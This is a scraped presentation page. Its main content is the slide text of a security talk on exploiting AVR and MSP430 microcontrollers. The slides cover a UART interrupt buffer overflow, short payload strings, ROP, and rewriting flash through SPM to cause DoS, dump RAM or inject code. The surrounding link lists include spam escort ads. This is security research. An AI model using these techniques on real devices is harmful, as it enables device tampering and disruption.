Webinar: Plataforma Renesas Synergy – Construindo sua aplicação MQTT com anal...Webinar: Plataforma Renesas Synergy – Construindo sua aplicação MQTT com anal...
Webinar: Plataforma Renesas Synergy – Construindo sua aplicação MQTT com anal...
 
SDS_SSL_MPM_UN_A4
SDS_SSL_MPM_UN_A4SDS_SSL_MPM_UN_A4
SDS_SSL_MPM_UN_A4
 
Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...
Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...
Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...
 
SIMATIC manager سيماتك منجر سيمنز
SIMATIC manager سيماتك منجر سيمنزSIMATIC manager سيماتك منجر سيمنز
SIMATIC manager سيماتك منجر سيمنز
 
S emb t10-development
S emb t10-developmentS emb t10-development
S emb t10-development
 
Redes
RedesRedes
Redes
 
What's New with ATTACK for ICS?
What's New with ATTACK for ICS?What's New with ATTACK for ICS?
What's New with ATTACK for ICS?
 
Efficient Reverse Engineering of Automotive Firmware
Efficient Reverse Engineering of Automotive FirmwareEfficient Reverse Engineering of Automotive Firmware
Efficient Reverse Engineering of Automotive Firmware
 
Virtualization & Network Connectivity
Virtualization & Network Connectivity Virtualization & Network Connectivity
Virtualization & Network Connectivity
 
Migrating to the 7200 controller george anderson marcus christensen
Migrating to the 7200 controller george anderson marcus christensenMigrating to the 7200 controller george anderson marcus christensen
Migrating to the 7200 controller george anderson marcus christensen
 
BMCArmor: A Hardware Protection Scheme for Bare-metal Clouds
BMCArmor: A Hardware Protection Scheme for Bare-metal CloudsBMCArmor: A Hardware Protection Scheme for Bare-metal Clouds
BMCArmor: A Hardware Protection Scheme for Bare-metal Clouds
 
Introduction to Embedded Systems
Introduction to Embedded SystemsIntroduction to Embedded Systems
Introduction to Embedded Systems
 
2012 ah vegas remote networking fundamentals
2012 ah vegas remote networking fundamentals2012 ah vegas remote networking fundamentals
2012 ah vegas remote networking fundamentals
 
Manual del sistema del controlador programable S7-200 CPU21x
Manual del sistema del controlador programable S7-200 CPU21xManual del sistema del controlador programable S7-200 CPU21x
Manual del sistema del controlador programable S7-200 CPU21x
 
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
 
Defcon 22-cesar-cerrudo-hacking-traffic-control-systems
Defcon 22-cesar-cerrudo-hacking-traffic-control-systemsDefcon 22-cesar-cerrudo-hacking-traffic-control-systems
Defcon 22-cesar-cerrudo-hacking-traffic-control-systems
 
Air vision ds
Air vision dsAir vision ds
Air vision ds
 

Plus de DefconRussia

[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...DefconRussia
 
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...DefconRussia
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobindingDefconRussia
 
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/LinuxDefconRussia
 
Георгий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangГеоргий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangDefconRussia
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC DefconRussia
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...DefconRussia
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
Attacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринAttacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринDefconRussia
 
Weakpass - defcon russia 23
Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23DefconRussia
 
nosymbols - defcon russia 20
nosymbols - defcon russia 20nosymbols - defcon russia 20
nosymbols - defcon russia 20DefconRussia
 
static - defcon russia 20
static - defcon russia 20static - defcon russia 20
static - defcon russia 20DefconRussia
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20DefconRussia
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20DefconRussia
 
Nedospasov defcon russia 23
Nedospasov defcon russia 23Nedospasov defcon russia 23
Nedospasov defcon russia 23DefconRussia
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23DefconRussia
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23DefconRussia
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...DefconRussia
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхDefconRussia
 

Plus de DefconRussia (20)

[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
 
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
 
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
 
Георгий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangГеоргий Зайцев - Reversing golang
Георгий Зайцев - Reversing golang
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
 
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
Attacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринAttacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей Тюрин
 
Weakpass - defcon russia 23
Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23
 
nosymbols - defcon russia 20
nosymbols - defcon russia 20nosymbols - defcon russia 20
nosymbols - defcon russia 20
 
static - defcon russia 20
static - defcon russia 20static - defcon russia 20
static - defcon russia 20
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20
 
Nedospasov defcon russia 23
Nedospasov defcon russia 23Nedospasov defcon russia 23
Nedospasov defcon russia 23
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
 

Dernier

Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 

Dernier (20)

Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 

Vadim Bardakov - AVR & MSP exploitation

  • 1. AVR & MSP exploitation Vadim Bardakov Security Researcher Digital Security (ERPScan)
  • 2. AVR & MSP exploitation Why now? • Inc. usage of uC • Nobody cares about code security for these devices © 2002—2013, Digital Security 2
  • 3. AVR & MSP exploitation Why now? • Inc. usage of uC • Nobody cares about code security for these devices • Inc. amount of easily accessible data channels • Microcontroller firmware can be retrieved © 2002—2013, Digital Security 3
  • 4. AVR & MSP exploitation Jokes © 2002—2013, Digital Security 4
  • 5. AVR & MSP exploitation What if it works? © 2002—2013, Digital Security 5
  • 6. AVR & MSP exploitation Oops… © 2002—2013, Digital Security 6
  • 7. AVR & MSP exploitation Firmware extraction Side channel attacks • Power analysis © 2002—2013, Digital Security 7
  • 8. AVR & MSP exploitation Firmware extraction Side channel attacks • Power analysis • Planarization • etc. © 2002—2013, Digital Security 8
  • 9. AVR & MSP exploitation Firmware extraction MSP430: • FRAM • 5xx • 6xx © 2002—2013, Digital Security 9
  • 10. AVR & MSP exploitation RAM MSP © 2002—2013, Digital Security AVR 10
  • 11. AVR & MSP exploitation RAM General purpose registers I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security 11
  • 12. AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security 12
  • 13. AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers SP Additional I/O registers Internal RAM © 2002—2013, Digital Security ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff 13
  • 14. AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Interrupt handler: UART Timers Comparators INT0..X © 2002—2013, Digital Security Additional I/O registers Internal RAM SP ffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff 14
  • 15. AVR & MSP exploitation Stack errors General purpose registers SP Interrupt handler: UART Timers Comparators INT0..X © 2002—2013, Digital Security I/O Special Function Registers Additional I/O registers Internal RAM ffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff 15
  • 16. AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 16
  • 17. AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 17
  • 18. AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 18
  • 19. AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 19
  • 20. AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Seems OK I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20
  • 21. AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Additional I/O registers Unknown offset Global Variables Internal RAM © 2002—2013, Digital Security 21
  • 22. AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Additional I/O registers Bypassing checks © 2002—2013, Digital Security Internal RAM 22
  • 23. AVR & MSP exploitation Buffer overflow Access: • Local variables • Return address: • Compiler-generated instructions • Interruption • Bootloader © 2002—2013, Digital Security 23
  • 24. AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } Casual for UART handlers © 2002—2013, Digital Security 24
  • 25. AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } print “xff”xB . “x010xFC”xN Atmel Studio 6.1 000001FB CLI 000001FC RJMP PC-0x0000 © 2002—2013, Digital Security 25
  • 26. AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } print “xff”xN 000001FB CLI 000001FC RJMP PC-0x0000 © 2002—2013, Digital Security 26
  • 27. AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } print “xff”xN 000001FB CLI 000001FC RJMP PC-0x0000 DoS © 2002—2013, Digital Security 27
  • 28. AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } void uart_puts(const char *s ) { while (*s) uart_putc(*s++); print “xff”xB . “x010xFC”xN. P uart_puts(p); 000001C8 LDD R24,Y+1 000001CA LDD R25, Y+2 000001CB CALL 0x0000014E Load indirect with displacement Load immediate Call subroutine Dumping RAM } © 2002—2013, Digital Security 28
  • 29. AVR & MSP exploitation Reprogramming © 2002—2013, Digital Security 29
  • 30. AVR & MSP exploitation Reprogramming Open-source bootloaders sucks in production. © 2002—2013, Digital Security 30
  • 31. AVR & MSP exploitation Reprogramming Load code to RAM print “xff”xB . “x000x16”xN. ROPTail Interruption handler Ideal for ROP © 2002—2013, Digital Security 31
  • 32. AVR & MSP exploitation Reprogramming Gain control to SPM print Code . “x000xFC”xN. P Atmex +00000343: 95E8 …. +00000351: 95E8 SPM Store program memory SPM Store program memory Writing code to FLASH © 2002—2013, Digital Security 32
  • 33. AVR & MSP exploitation Sum • Simple attacks can be conducted blindly • Different consequences: • DoS • Modifying device configuration • etc. © 2002—2013, Digital Security 33
  • 34. Digital Security in Moscow: +7 (495) 223-07-86 Digital Security in Saint Petersburg: +7 (812) 703-15-47 www.dsec.ru www.erpscan.com v.bardakov@dsec.ru © 2002—2013, Digital Security 34